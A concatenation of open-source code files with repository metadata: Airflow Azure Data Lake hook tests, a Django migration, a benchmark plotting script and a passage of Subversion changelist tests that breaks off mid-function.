tests/providers/microsoft/azure/hooks/test_azure_data_lake.py
|
daemon-demon/airflow
|
6f96e81f0123b30750fb68ec496246023bf63f35
|
[
"Apache-2.0"
] | 20
|
2021-01-23T12:33:08.000Z
|
2021-12-07T22:30:37.000Z
|
tests/providers/microsoft/azure/hooks/test_azure_data_lake.py
|
daemon-demon/airflow
|
6f96e81f0123b30750fb68ec496246023bf63f35
|
[
"Apache-2.0"
] | 1
|
2020-11-04T03:12:47.000Z
|
2020-11-04T03:12:47.000Z
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import json
import unittest
import mock
from airflow.models import Connection
from airflow.utils import db
class TestAzureDataLakeHook(unittest.TestCase):
def setUp(self):
db.merge_conn(
Connection(
conn_id='adl_test_key',
conn_type='azure_data_lake',
login='client_id',
password='client secret',
extra=json.dumps({"tenant": "tenant", "account_name": "accountname"}),
)
)
@mock.patch('airflow.providers.microsoft.azure.hooks.azure_data_lake.lib', autospec=True)
def test_conn(self, mock_lib):
from azure.datalake.store import core
from airflow.providers.microsoft.azure.hooks.azure_data_lake import AzureDataLakeHook
hook = AzureDataLakeHook(azure_data_lake_conn_id='adl_test_key')
self.assertIsNone(hook._conn)
self.assertEqual(hook.conn_id, 'adl_test_key')
self.assertIsInstance(hook.get_conn(), core.AzureDLFileSystem)
assert mock_lib.auth.called
@mock.patch(
'airflow.providers.microsoft.azure.hooks.azure_data_lake.core.AzureDLFileSystem', autospec=True
)
@mock.patch('airflow.providers.microsoft.azure.hooks.azure_data_lake.lib', autospec=True)
def test_check_for_blob(self, mock_lib, mock_filesystem):
from airflow.providers.microsoft.azure.hooks.azure_data_lake import AzureDataLakeHook
hook = AzureDataLakeHook(azure_data_lake_conn_id='adl_test_key')
hook.check_for_file('file_path')
mock_filesystem.glob.called
@mock.patch(
'airflow.providers.microsoft.azure.hooks.azure_data_lake.multithread.ADLUploader', autospec=True
)
@mock.patch('airflow.providers.microsoft.azure.hooks.azure_data_lake.lib', autospec=True)
def test_upload_file(self, mock_lib, mock_uploader):
from airflow.providers.microsoft.azure.hooks.azure_data_lake import AzureDataLakeHook
hook = AzureDataLakeHook(azure_data_lake_conn_id='adl_test_key')
hook.upload_file(
local_path='tests/hooks/test_adl_hook.py',
remote_path='/test_adl_hook.py',
nthreads=64,
overwrite=True,
buffersize=4194304,
blocksize=4194304,
)
mock_uploader.assert_called_once_with(
hook.get_conn(),
lpath='tests/hooks/test_adl_hook.py',
rpath='/test_adl_hook.py',
nthreads=64,
overwrite=True,
buffersize=4194304,
blocksize=4194304,
)
@mock.patch(
'airflow.providers.microsoft.azure.hooks.azure_data_lake.multithread.ADLDownloader', autospec=True
)
@mock.patch('airflow.providers.microsoft.azure.hooks.azure_data_lake.lib', autospec=True)
def test_download_file(self, mock_lib, mock_downloader):
from airflow.providers.microsoft.azure.hooks.azure_data_lake import AzureDataLakeHook
hook = AzureDataLakeHook(azure_data_lake_conn_id='adl_test_key')
hook.download_file(
local_path='test_adl_hook.py',
remote_path='/test_adl_hook.py',
nthreads=64,
overwrite=True,
buffersize=4194304,
blocksize=4194304,
)
mock_downloader.assert_called_once_with(
hook.get_conn(),
lpath='test_adl_hook.py',
rpath='/test_adl_hook.py',
nthreads=64,
overwrite=True,
buffersize=4194304,
blocksize=4194304,
)
@mock.patch(
'airflow.providers.microsoft.azure.hooks.azure_data_lake.core.AzureDLFileSystem', autospec=True
)
@mock.patch('airflow.providers.microsoft.azure.hooks.azure_data_lake.lib', autospec=True)
def test_list_glob(self, mock_lib, mock_fs):
from airflow.providers.microsoft.azure.hooks.azure_data_lake import AzureDataLakeHook
hook = AzureDataLakeHook(azure_data_lake_conn_id='adl_test_key')
hook.list('file_path/*')
mock_fs.return_value.glob.assert_called_once_with('file_path/*')
@mock.patch(
'airflow.providers.microsoft.azure.hooks.azure_data_lake.core.AzureDLFileSystem', autospec=True
)
@mock.patch('airflow.providers.microsoft.azure.hooks.azure_data_lake.lib', autospec=True)
def test_list_walk(self, mock_lib, mock_fs):
from airflow.providers.microsoft.azure.hooks.azure_data_lake import AzureDataLakeHook
hook = AzureDataLakeHook(azure_data_lake_conn_id='adl_test_key')
hook.list('file_path/some_folder/')
mock_fs.return_value.walk.assert_called_once_with('file_path/some_folder/')
| 40.022059
| 106
| 0.696123
|
265122ffd7474530f49422c264a7440796388af8
| 2,636
|
py
|
Python
|
appengine/src/greenday_core/migrations/0016_auto_20150521_1325.py
|
meedan/montage
|
4da0116931edc9af91f226876330645837dc9bcc
|
[
"Apache-2.0"
] | 6
|
2018-07-31T16:48:07.000Z
|
2020-02-01T03:17:51.000Z
|
appengine/src/greenday_core/migrations/0016_auto_20150521_1325.py
|
meedan/montage
|
4da0116931edc9af91f226876330645837dc9bcc
|
[
"Apache-2.0"
] | 41
|
2018-08-07T16:43:07.000Z
|
2020-06-05T18:54:50.000Z
|
appengine/src/greenday_core/migrations/0016_auto_20150521_1325.py
|
meedan/montage
|
4da0116931edc9af91f226876330645837dc9bcc
|
[
"Apache-2.0"
] | 1
|
2018-08-07T16:40:18.000Z
|
2018-08-07T16:40:18.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('greenday_core', '0015_auto_20150422_1624'),
]
operations = [
migrations.AlterField(
model_name='event',
name='event_kind',
field=models.IntegerField(),
),
migrations.AlterField(
model_name='event',
name='kind',
field=models.IntegerField(verbose_name=((0, b'PROJECTCREATED'), (1, b'PROJECTUPDATED'), (2, b'PROJECTDELETED'), (50, b'PROJECTRESTORED'), (100, b'VIDEOCREATED'), (101, b'VIDEOUPDATED'), (102, b'VIDEODELETED'), (150, b'VIDEOHIGHLIGHTED'), (151, b'VIDEOUNHIGHLIGHTED'), (152, b'VIDEOARCHIVED'), (153, b'VIDEOUNARCHIVED'), (200, b'USERCREATED'), (201, b'USERUPDATED'), (202, b'USERDELETED'), (250, b'USERACCEPTEDNDA'), (251, b'USERINVITEDASPROJECTUSER'), (252, b'PENDINGUSERREMOVED'), (253, b'USERACCEPTEDPROJECTINVITE'), (254, b'USERREJECTEDPROJECTINVITE'), (255, b'USERREMOVED'), (256, b'PROJECTCOLLABORATORONLINE'), (257, b'PROJECTCOLLABORATOROFFLINE'), (300, b'VIDEOCOLLECTIONCREATED'), (301, b'VIDEOCOLLECTIONUPDATED'), (302, b'VIDEOCOLLECTIONDELETED'), (350, b'VIDEOADDEDTOCOLLECTION'), (351, b'VIDEOREMOVEDFROMCOLLECTION'), (450, b'PENDINGUSERINVITEDASPROJECTADMIN'), (451, b'PENDINGUSERINVITEDASPROJECTUSER'), (500, b'PROJECTROOTCOMMENTCREATED'), (501, b'PROJECTCOMMENTUPDATED'), (502, b'PROJECTCOMMENTDELETED'), (600, b'TIMEDVIDEOROOTCOMMENTCREATED'), (601, b'TIMEDVIDEOCOMMENTUPDATED'), (602, b'TIMEDVIDEOCOMMENTDELETED'), (700, b'TIMEDVIDEOREPLYCOMMENTCREATED'), (701, b'TIMEDVIDEOREPLYCOMMENTUPDATED'), (702, b'TIMEDVIDEOREPLYCOMMENTDELETED'), (800, b'PROJECTREPLYCOMMENTCREATED'), (801, b'PROJECTREPLYCOMMENTUPDATED'), (802, b'PROJECTREPLYCOMMENTDELETED'))),
),
migrations.AlterField(
model_name='event',
name='object_id',
field=models.IntegerField(null=True),
),
migrations.AlterField(
model_name='event',
name='object_kind',
field=models.IntegerField(),
),
migrations.AlterField(
model_name='event',
name='project_id',
field=models.IntegerField(null=True),
),
migrations.AlterField(
model_name='event',
name='timestamp',
field=models.DateTimeField(),
),
migrations.AlterField(
model_name='event',
name='video_id',
field=models.IntegerField(null=True),
),
]
| 52.72
| 1,380
| 0.645675
|
8186927b1589218c705bdeb37f5bb1df710b4840
| 6,371
|
py
|
Python
|
plot.py
|
jazzsewera/aisde-lab2
|
072c8cddeefa4115a946a6915bd1d1a60f4b52ca
|
[
"MIT"
] | null | null | null |
plot.py
|
jazzsewera/aisde-lab2
|
072c8cddeefa4115a946a6915bd1d1a60f4b52ca
|
[
"MIT"
] | null | null | null |
plot.py
|
jazzsewera/aisde-lab2
|
072c8cddeefa4115a946a6915bd1d1a60f4b52ca
|
[
"MIT"
] | null | null | null |
import numpy as np
from scipy.stats import linregress
import sys
import getopt
import json
import re
try:
from matplotlib import pyplot as plt
except Exception:
import matplotlib
matplotlib.use('pdf')
from matplotlib import pyplot as plt
def save_plot(alg_name, file_suffix, y_label, legend_list, title_prefix,
is_log=False, axes=None):
plt.title(title_prefix + ' for {0} algorithm'.format(
re.sub(r'\_',
' ',
alg_name)
)
)
plt.legend(legend_list, loc='upper left')
if is_log:
plt.xlabel('Log of no. of elements')
axes.get_legend().remove()
else:
plt.xlabel('No. of elements in array')
plt.ylabel(y_label)
plt.grid()
plt.ticklabel_format(axis='both',
style='sci',
scilimits=(-3, 3),
useOffset=False)
plt.savefig('out/pdf/' + alg_name + '_' + file_suffix + '.pdf')
def plot_log(execution_time_array, data_array_size,
alg_name):
'''Log plot of exec time
Not very universal, you may have to tweak
some numbers'''
data_big_val = data_array_size
if 0 not in execution_time_array:
exec_time_log_arr = np.log2(execution_time_array)
data_big_val_log = np.log2(data_big_val)
else:
print('Some of the values in exec_time are 0')
print('and logarithm of 0 is minus infinity.')
print('Discarding those values for this plot')
exec_time_arr = [x for x in execution_time_array if x is not 0]
exec_time_log_arr = np.log2(exec_time_arr)
arr_start = len(data_big_val) - len(exec_time_arr)
data_big_val_log = np.log2(data_big_val[arr_start:])
slope, _, _, _, err = linregress(data_big_val_log, exec_time_log_arr)
# print(slope)
# print(err)
ax = plt.axes()
plt.plot(
data_big_val_log, exec_time_log_arr, 'o-'
)
plt.text(0.5, 0.15, # position of the text relative to axes
' Linregress:\nslope = {0}\n err = {1}'.format(
np.around(slope, 5), np.around(err, 5)
),
horizontalalignment='left',
verticalalignment='baseline',
transform=ax.transAxes,
fontdict=dict(
family='monospace',
color='darkred',
weight='bold',
size=12)
)
save_plot(alg_name, 'exec_log_log', 'Log of exec time',
[''],
'Log of exec time',
is_log=True,
axes=ax)
plt.clf()
def plot_standard(argv, do_plot_log=False):
try:
with open(str(argv[0])) as input_file:
data = json.load(input_file)
with open(str(argv[1])) as input_array_size_file:
data_array_size = json.load(input_array_size_file)
except Exception:
print('Usage: python plot.py [-l] <input_file>'
'<input_array_size_file>')
print('\tfor regular plotting, -l option for'
'plotting log (you will need to tweak numbers in source file)')
print('python plot.py -c <input_file0>,...'
' -n <input_array_size_file>')
print('\tfor comparisons')
print('Make sure you have valid json files')
quit()
file_name = re.sub('out/', '', str(argv[0]))
alg_name = re.sub('.json', '', file_name)
'''Execution time plot'''
execution_time_array = [data_elem['execution_time']
for data_elem in data]
plt.plot(data_array_size, execution_time_array, 'o-')
save_plot(alg_name, 'exec_time', 'Execution time [s]',
['Execution time'],
'Time complexity')
plt.clf()
'''No of operations total plot'''
com_arr_alg = [elem['algorithm']['comparisons'] for elem in data]
swps_arr_alg = [elem['algorithm']['swaps'] for elem in data]
com_arr_imp = [elem['implementation']['comparisons'] for elem in data]
add_arr_imp = [elem['implementation']['additions'] for elem in data]
plt.plot(
data_array_size, com_arr_alg, 'o-',
data_array_size, swps_arr_alg, 'o-',
data_array_size, com_arr_imp, 'o-',
data_array_size, add_arr_imp, 'o-'
)
legends = [
'Comparisons (algorithm)',
'Swaps (algorithm)',
'Comparisons (implementation)',
'Additions (implementation)'
]
save_plot(alg_name, 'oper_count', 'No. of operations', legends,
'No. of total operations')
plt.clf()
if do_plot_log:
plot_log(execution_time_array, data_array_size, alg_name)
def plot_compare(opts, args):
data_comp = []
legends = []
for opt, arg in opts:
if opt == '-c':
for file in arg.split(','):
with open(file) as in_file:
data_comp.append(json.load(in_file))
legends.append(re.sub(r'_', ' ',
re.sub('.json', '',
re.sub('out/', '', file)
)
)
)
elif opt == '-n':
with open(arg) as in_file:
data_comp_arr_size = json.load(in_file)
for data in data_comp:
execution_time_array = [data_elem['execution_time']
for data_elem in data]
plt.plot(data_comp_arr_size, execution_time_array, 'o-')
save_plot('all', 'comparison', 'Time of execution [s]',
legends, 'Time of execution')
def main(argv):
std_mode = True
try:
opts, args = getopt.getopt(argv, 'c:n:l')
except getopt.GetoptError:
exit()
for opt, arg in opts:
if opt == '-c':
std_mode = False
plot_compare(opts, args)
if opt == '-l':
std_mode = False
plot_standard(argv[1:], True)
if std_mode:
plot_standard(argv)
if __name__ == '__main__':
main(sys.argv[1:])
| 34.252688
| 77
| 0.533511
|
4652acc7aabe49121906ffaf28dd20a60123253d
| 47,549
|
py
|
Python
|
subversion/tests/cmdline/changelist_tests.py
|
ruchirarya/svn
|
81502a213251c2af21361a942bd9a8cd7d3adb9f
|
[
"Apache-2.0"
] | 7
|
2018-01-18T06:13:21.000Z
|
2020-07-09T03:46:16.000Z
|
depe/subversion/subversion/tests/cmdline/changelist_tests.py
|
louis-tru/TouchCode2
|
91c182aeaa37fba16e381ea749d32906dab1aeea
|
[
"BSD-3-Clause-Clear"
] | 4
|
2015-01-12T22:23:41.000Z
|
2015-01-12T22:33:52.000Z
|
src/subversion/subversion/tests/cmdline/changelist_tests.py
|
schwern/alien-svn
|
7423b08f9bc4fdf0ac0d7ea53495269b21b3e8f9
|
[
"Apache-2.0"
] | 1
|
2020-11-04T07:25:22.000Z
|
2020-11-04T07:25:22.000Z
|
#!/usr/bin/env python
#
# changelist_tests.py: testing changelist uses.
#
# Subversion is a tool for revision control.
# See http://subversion.apache.org for more information.
#
# ====================================================================
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
######################################################################
# General modules
import string, sys, os, re
# Our testing module
import svntest
# (abbreviation)
Skip = svntest.testcase.Skip_deco
SkipUnless = svntest.testcase.SkipUnless_deco
XFail = svntest.testcase.XFail_deco
Issues = svntest.testcase.Issues_deco
Issue = svntest.testcase.Issue_deco
Wimp = svntest.testcase.Wimp_deco
Item = svntest.wc.StateItem
######################################################################
# Utilities
def mod_all_files(wc_dir, new_text):
"""Walk over working copy WC_DIR, appending NEW_TEXT to all the
files in that tree (but not inside the .svn areas of that tree)."""
dot_svn = svntest.main.get_admin_name()
for dirpath, dirs, files in os.walk(wc_dir):
if dot_svn in dirs:
dirs.remove(dot_svn)
for name in files:
svntest.main.file_append(os.path.join(dirpath, name), new_text)
def changelist_all_files(wc_dir, name_func):
"""Walk over working copy WC_DIR, adding versioned files to
changelists named by invoking NAME_FUNC(full-path-of-file) and
noting its string return value (or None, if we wish to remove the
file from a changelist)."""
dot_svn = svntest.main.get_admin_name()
for dirpath, dirs, files in os.walk(wc_dir):
if dot_svn in dirs:
dirs.remove(dot_svn)
for name in files:
full_path = os.path.join(dirpath, name)
clname = name_func(full_path)
if not clname:
svntest.main.run_svn(None, "changelist", "--remove", full_path)
else:
svntest.main.run_svn(None, "changelist", clname, full_path)
def clname_from_lastchar_cb(full_path):
"""Callback for changelist_all_files() that returns a changelist
name matching the last character in the file's name. For example,
after running this on a greek tree where every file has some text
modification, 'svn status' shows:
--- Changelist 'a':
M A/B/lambda
M A/B/E/alpha
M A/B/E/beta
M A/D/gamma
M A/D/H/omega
M iota
--- Changelist 'u':
M A/mu
M A/D/G/tau
--- Changelist 'i':
M A/D/G/pi
M A/D/H/chi
M A/D/H/psi
--- Changelist 'o':
M A/D/G/rho
"""
return full_path[-1]
# Regular expressions for 'svn changelist' output.
_re_cl_rem_pattern = "^D \[(.*)\] (.*)"
_re_cl_skip = re.compile("Skipped '(.*)'")
_re_cl_add = re.compile("^A \[(.*)\] (.*)")
_re_cl_rem = re.compile(_re_cl_rem_pattern)
def verify_changelist_output(output, expected_adds=None,
expected_removals=None,
expected_skips=None):
"""Compare lines of OUTPUT from 'svn changelist' against
EXPECTED_ADDS (a dictionary mapping paths to changelist names),
EXPECTED_REMOVALS (a dictionary mapping paths to ... whatever), and
EXPECTED_SKIPS (a dictionary mapping paths to ... whatever).
EXPECTED_SKIPS is ignored if None."""
num_expected = 0
if expected_adds:
num_expected += len(expected_adds)
if expected_removals:
num_expected += len(expected_removals)
if expected_skips:
num_expected += len(expected_skips)
if not expected_skips:
output = [line for line in output if (not _re_cl_skip.match(line))]
for line in output:
line = line.rstrip()
match = _re_cl_rem.match(line)
if match \
and expected_removals \
and match.group(2) in expected_removals:
continue
elif match:
raise svntest.Failure("Unexpected changelist removal line: " + line)
match = _re_cl_add.match(line)
if match \
and expected_adds \
and expected_adds.get(match.group(2)) == match.group(1):
continue
elif match:
raise svntest.Failure("Unexpected changelist add line: " + line)
match = _re_cl_skip.match(line)
if match \
and expected_skips \
and match.group(2) in expected_skips:
continue
elif match:
raise svntest.Failure("Unexpected changelist skip line: " + line)
raise svntest.Failure("Unexpected line: " + line)
if len(output) != num_expected:
raise svntest.Failure("Unexpected number of 'svn changelist' output " +
"lines (%d vs %d)" % (len(output), num_expected))
def verify_pget_output(output, expected_props):
"""Compare lines of OUTPUT from 'svn propget' against EXPECTED_PROPS
(a dictionary mapping paths to property values)."""
_re_pget = re.compile('^(.*) - (.*)$')
actual_props = {}
for line in output:
try:
path, prop = line.rstrip().split(' - ')
except:
raise svntest.Failure("Unexpected output line: " + line)
actual_props[path] = prop
if expected_props != actual_props:
raise svntest.Failure("Got unexpected property results\n"
"\tExpected: %s\n"
"\tActual: %s" % (str(expected_props),
str(actual_props)))
######################################################################
# Tests
#
# Each test must return on success or raise on failure.
#----------------------------------------------------------------------
def add_remove_changelists(sbox):
"add and remove files from changelists"
sbox.build()
wc_dir = sbox.wc_dir
### 'Skip' notifications
def expected_skips_under(*greek_path):
"return a dict mapping Greek-tree directories below GREEK_PATH to None"
expected_skips = {}
for path in expected_skips_all:
if path.startswith(os.path.join(wc_dir, *greek_path)):
expected_skips[path] = None
return expected_skips
def all_parents(expected_adds):
"""return a dict mapping Greek-tree directories above directories in
EXPECTED_ADDS to None"""
expected_skips = {}
for path in expected_adds.keys():
if not os.path.isdir(path):
path = os.path.dirname(path)
while path != wc_dir:
expected_skips[path] = None
path = os.path.dirname(path)
expected_skips[wc_dir] = None
return expected_skips
# all dirs in the Greek tree
expected_skips_all = dict([(x, None) for x in [
sbox.ospath(''),
sbox.ospath('A'),
sbox.ospath('A/B'),
sbox.ospath('A/B/E'),
sbox.ospath('A/B/F'),
sbox.ospath('A/C'),
sbox.ospath('A/D'),
sbox.ospath('A/D/G'),
sbox.ospath('A/D/H'),
]])
expected_skips_wc_dir = { wc_dir : None }
### First, we play with just adding to changelists ###
# svn changelist foo WC_DIR
exit_code, output, errput = svntest.main.run_svn(None, "changelist", "foo",
wc_dir)
verify_changelist_output(output) # nothing expected
# svn changelist foo WC_DIR --depth files
exit_code, output, errput = svntest.main.run_svn(None, "changelist", "foo",
"--depth", "files",
wc_dir)
expected_adds = {
os.path.join(wc_dir, 'iota') : 'foo',
}
verify_changelist_output(output, expected_adds)
# svn changelist foo WC_DIR --depth infinity
exit_code, output, errput = svntest.main.run_svn(None, "changelist", "foo",
"--depth", "infinity",
wc_dir)
expected_adds = {
sbox.ospath('A/B/E/alpha') : 'foo',
sbox.ospath('A/B/E/beta') : 'foo',
sbox.ospath('A/B/lambda') : 'foo',
sbox.ospath('A/D/G/pi') : 'foo',
sbox.ospath('A/D/G/rho') : 'foo',
sbox.ospath('A/D/G/tau') : 'foo',
sbox.ospath('A/D/H/chi') : 'foo',
sbox.ospath('A/D/H/omega') : 'foo',
sbox.ospath('A/D/H/psi') : 'foo',
sbox.ospath('A/D/gamma') : 'foo',
sbox.ospath('A/mu') : 'foo',
}
verify_changelist_output(output, expected_adds)
### Now, change some changelists ###
# svn changelist bar WC_DIR/A/D --depth infinity
exit_code, output, errput = svntest.main.run_svn(".*", "changelist", "bar",
"--depth", "infinity",
sbox.ospath('A/D'))
expected_adds = {
sbox.ospath('A/D/G/pi') : 'bar',
sbox.ospath('A/D/G/rho') : 'bar',
sbox.ospath('A/D/G/tau') : 'bar',
sbox.ospath('A/D/H/chi') : 'bar',
sbox.ospath('A/D/H/omega') : 'bar',
sbox.ospath('A/D/H/psi') : 'bar',
sbox.ospath('A/D/gamma') : 'bar',
}
expected_removals = expected_adds
verify_changelist_output(output, expected_adds, expected_removals)
# svn changelist baz WC_DIR/A/D/H --depth infinity
exit_code, output, errput = svntest.main.run_svn(".*", "changelist", "baz",
"--depth", "infinity",
sbox.ospath('A/D/H'))
expected_adds = {
sbox.ospath('A/D/H/chi') : 'baz',
sbox.ospath('A/D/H/omega') : 'baz',
sbox.ospath('A/D/H/psi') : 'baz',
}
expected_removals = expected_adds
verify_changelist_output(output, expected_adds, expected_removals)
### Now, let's selectively rename some changelists ###
# svn changelist foo-rename WC_DIR --depth infinity --changelist foo
exit_code, output, errput = svntest.main.run_svn(".*", "changelist",
"foo-rename",
"--depth", "infinity",
"--changelist", "foo",
wc_dir)
expected_adds = {
sbox.ospath('A/B/E/alpha') : 'foo-rename',
sbox.ospath('A/B/E/beta') : 'foo-rename',
sbox.ospath('A/B/lambda') : 'foo-rename',
sbox.ospath('A/mu') : 'foo-rename',
sbox.ospath('iota') : 'foo-rename',
}
expected_removals = expected_adds
verify_changelist_output(output, expected_adds, expected_removals)
# svn changelist bar WC_DIR --depth infinity
# --changelist foo-rename --changelist baz
exit_code, output, errput = svntest.main.run_svn(
".*", "changelist", "bar", "--depth", "infinity",
"--changelist", "foo-rename", "--changelist", "baz", wc_dir)
expected_adds = {
sbox.ospath('A/B/E/alpha') : 'bar',
sbox.ospath('A/B/E/beta') : 'bar',
sbox.ospath('A/B/lambda') : 'bar',
sbox.ospath('A/D/H/chi') : 'bar',
sbox.ospath('A/D/H/omega') : 'bar',
sbox.ospath('A/D/H/psi') : 'bar',
sbox.ospath('A/mu') : 'bar',
sbox.ospath('iota') : 'bar',
}
expected_removals = expected_adds
verify_changelist_output(output, expected_adds, expected_removals)
### Okay. Time to remove some stuff from changelists now. ###
# svn changelist --remove WC_DIR
exit_code, output, errput = svntest.main.run_svn(None, "changelist",
"--remove", wc_dir)
verify_changelist_output(output) # nothing expected
# svn changelist --remove WC_DIR --depth files
exit_code, output, errput = svntest.main.run_svn(None, "changelist",
"--remove",
"--depth", "files",
wc_dir)
expected_removals = {
os.path.join(wc_dir, 'iota') : None,
}
verify_changelist_output(output, None, expected_removals)
# svn changelist --remove WC_DIR --depth infinity
exit_code, output, errput = svntest.main.run_svn(None, "changelist",
"--remove",
"--depth", "infinity",
wc_dir)
expected_removals = {
sbox.ospath('A/B/E/alpha') : None,
sbox.ospath('A/B/E/beta') : None,
sbox.ospath('A/B/lambda') : None,
sbox.ospath('A/D/G/pi') : None,
sbox.ospath('A/D/G/rho') : None,
sbox.ospath('A/D/G/tau') : None,
sbox.ospath('A/D/H/chi') : None,
sbox.ospath('A/D/H/omega') : None,
sbox.ospath('A/D/H/psi') : None,
sbox.ospath('A/D/gamma') : None,
sbox.ospath('A/mu') : None,
}
verify_changelist_output(output, None, expected_removals)
### Add files to changelists based on the last character in their names ###
changelist_all_files(wc_dir, clname_from_lastchar_cb)
### Now, do selective changelist removal ###
# svn changelist --remove WC_DIR --depth infinity --changelist a
exit_code, output, errput = svntest.main.run_svn(None, "changelist",
"--remove",
"--depth", "infinity",
"--changelist", "a",
wc_dir)
expected_removals = {
sbox.ospath('A/B/E/alpha') : None,
sbox.ospath('A/B/E/beta') : None,
sbox.ospath('A/B/lambda') : None,
sbox.ospath('A/D/H/omega') : None,
sbox.ospath('A/D/gamma') : None,
sbox.ospath('iota') : None,
}
verify_changelist_output(output, None, expected_removals)
# svn changelist --remove WC_DIR --depth infinity
# --changelist i --changelist o
exit_code, output, errput = svntest.main.run_svn(None, "changelist",
"--remove",
"--depth", "infinity",
"--changelist", "i",
"--changelist", "o",
wc_dir)
expected_removals = {
sbox.ospath('A/D/G/pi') : None,
sbox.ospath('A/D/G/rho') : None,
sbox.ospath('A/D/H/chi') : None,
sbox.ospath('A/D/H/psi') : None,
}
verify_changelist_output(output, None, expected_removals)
#----------------------------------------------------------------------
def commit_one_changelist(sbox):
"commit with single --changelist"
sbox.build()
wc_dir = sbox.wc_dir
# Add a line of text to all the versioned files in the tree.
mod_all_files(wc_dir, "New text.\n")
# Add files to changelists based on the last character in their names.
changelist_all_files(wc_dir, clname_from_lastchar_cb)
# Now, test a commit that uses a single changelist filter (--changelist a).
expected_output = svntest.wc.State(wc_dir, {
'A/B/lambda' : Item(verb='Sending'),
'A/B/E/alpha' : Item(verb='Sending'),
'A/B/E/beta' : Item(verb='Sending'),
'A/D/gamma' : Item(verb='Sending'),
'A/D/H/omega' : Item(verb='Sending'),
'iota' : Item(verb='Sending'),
})
expected_status = svntest.actions.get_virginal_state(wc_dir, 1)
expected_status.tweak('A/mu', 'A/D/G/tau', 'A/D/G/pi', 'A/D/H/chi',
'A/D/H/psi', 'A/D/G/rho', wc_rev=1, status='M ')
expected_status.tweak('iota', 'A/B/lambda', 'A/B/E/alpha', 'A/B/E/beta',
'A/D/gamma', 'A/D/H/omega', wc_rev=2, status=' ')
svntest.actions.run_and_verify_commit(wc_dir,
expected_output,
expected_status,
None,
wc_dir,
"--changelist",
"a")
#----------------------------------------------------------------------
def commit_multiple_changelists(sbox):
"commit with multiple --changelist's"
sbox.build()
wc_dir = sbox.wc_dir
# Add a line of text to all the versioned files in the tree.
mod_all_files(wc_dir, "New text.\n")
# Add files to changelists based on the last character in their names.
changelist_all_files(wc_dir, clname_from_lastchar_cb)
# Now, test a commit that uses multiple changelist filters
# (--changelist=a --changelist=i).
expected_output = svntest.wc.State(wc_dir, {
'A/B/lambda' : Item(verb='Sending'),
'A/B/E/alpha' : Item(verb='Sending'),
'A/B/E/beta' : Item(verb='Sending'),
'A/D/gamma' : Item(verb='Sending'),
'A/D/H/omega' : Item(verb='Sending'),
'iota' : Item(verb='Sending'),
'A/D/G/pi' : Item(verb='Sending'),
'A/D/H/chi' : Item(verb='Sending'),
'A/D/H/psi' : Item(verb='Sending'),
})
expected_status = svntest.actions.get_virginal_state(wc_dir, 1)
expected_status.tweak('A/mu', 'A/D/G/tau', 'A/D/G/rho',
wc_rev=1, status='M ')
expected_status.tweak('iota', 'A/B/lambda', 'A/B/E/alpha', 'A/B/E/beta',
'A/D/gamma', 'A/D/H/omega', 'A/D/G/pi', 'A/D/H/chi',
'A/D/H/psi', wc_rev=2, status=' ')
svntest.actions.run_and_verify_commit(wc_dir,
expected_output,
expected_status,
None,
wc_dir,
"--changelist", "a",
"--changelist", "i")
#----------------------------------------------------------------------
def info_with_changelists(sbox):
"info --changelist"
sbox.build()
wc_dir = sbox.wc_dir
# Add files to changelists based on the last character in their names.
changelist_all_files(wc_dir, clname_from_lastchar_cb)
# Now, test various combinations of changelist specification and depths.
for clname in [['a'], ['i'], ['a', 'i']]:
for depth in [None, 'files', 'infinity']:
# Figure out what we expect to see in our info output.
expected_paths = []
if 'a' in clname:
if depth == 'infinity':
expected_paths.append('A/B/lambda')
expected_paths.append('A/B/E/alpha')
expected_paths.append('A/B/E/beta')
expected_paths.append('A/D/gamma')
expected_paths.append('A/D/H/omega')
if depth == 'files' or depth == 'infinity':
expected_paths.append('iota')
if 'i' in clname:
if depth == 'infinity':
expected_paths.append('A/D/G/pi')
expected_paths.append('A/D/H/chi')
expected_paths.append('A/D/H/psi')
expected_paths = sorted([os.path.join(wc_dir, x.replace('/', os.sep)) for x in expected_paths])
# Build the command line.
args = ['info', wc_dir]
for cl in clname:
args.append('--changelist')
args.append(cl)
if depth:
args.append('--depth')
args.append(depth)
# Run 'svn info ...'
exit_code, output, errput = svntest.main.run_svn(None, *args)
# Filter the output for lines that begin with 'Path:', and
# reduce even those lines to just the actual path.
paths = sorted([x[6:].rstrip() for x in output if x[:6] == 'Path: '])
# And, compare!
if (paths != expected_paths):
raise svntest.Failure("Expected paths (%s) and actual paths (%s) "
"don't gel" % (str(expected_paths), str(paths)))
#----------------------------------------------------------------------
def diff_with_changelists(sbox):
"diff --changelist (wc-wc and repos-wc)"
sbox.build()
wc_dir = sbox.wc_dir
# Add a line of text to all the versioned files in the tree.
mod_all_files(wc_dir, "New text.\n")
# Add files to changelists based on the last character in their names.
changelist_all_files(wc_dir, clname_from_lastchar_cb)
# Now, test various combinations of changelist specification and depths.
for is_repos_wc in [0, 1]:
for clname in [['a'], ['i'], ['a', 'i']]:
for depth in ['files', 'infinity']:
# Figure out what we expect to see in our diff output.
expected_paths = []
if 'a' in clname:
if depth == 'infinity':
expected_paths.append('A/B/lambda')
expected_paths.append('A/B/E/alpha')
expected_paths.append('A/B/E/beta')
expected_paths.append('A/D/gamma')
expected_paths.append('A/D/H/omega')
if depth == 'files' or depth == 'infinity':
expected_paths.append('iota')
if 'i' in clname:
if depth == 'infinity':
expected_paths.append('A/D/G/pi')
